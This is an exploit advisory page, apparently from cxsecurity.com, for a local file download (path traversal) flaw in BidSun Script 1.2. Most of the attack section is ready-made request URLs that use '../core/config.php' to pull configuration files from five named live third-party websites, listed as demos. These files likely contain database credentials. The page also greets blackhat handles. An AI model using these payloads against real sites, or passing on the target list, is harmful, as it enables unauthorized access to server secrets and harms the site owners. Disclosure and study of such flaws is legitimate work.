BidSun Script Local File Download Vulnerability

2016.01.13
Credit: Milad Hacking
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

/*********************************************************************************** ** Exploit Title: BidSun Script Local File Download Vulnerability ** ** Exploit Author: FullSecurity.org ** ** Discovered By: Milad Hacking ** ** Vendor Homepage : http://bidsun.ir/ ** ** Demo Script Link: http://bidsun.ir/demo/ ** ** Version : 1.2 ** ** Date: 2016-01-13 ** ** Tested on: Kali Linux / lceweasel ** *********************************************************************************** ** Demo : http://knownsunknowns.com/index.php?mod=download&met=downFile&fileName=../core/config.php http://boloorbook.com/index.php?mod=download&met=downFile&fileName=../core/config.php http://arman.rahimzadeh.ir/index.php?mod=download&met=downFile&fileName=../core/config.php http://www.waresin.ir/index.php?mod=download&met=downFile&fileName=../core/config.php http://www.touristban.com/index.php?mod=download&met=downFile&fileName=../core/config.php *********************************************************************************** ** Special thanks to: iliya Norton - Milad Hacking - Mohamad Ghasemi - irhblackhat - distr0watch - N3TC4T - Mohamad Nofozi - Mr.G}{o$t - s4livan - MRS4JJ4D - SeCrEt_HaCkEr - Xodiak Blackhat - Shadow_Walker <3 *********************************************************************************** https://telegram.me/thehacking http://FullSecurity.org milad.hacking.blackhat@Gmail.com ***********************************************************************************

References:

http://FullSecurity.org


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top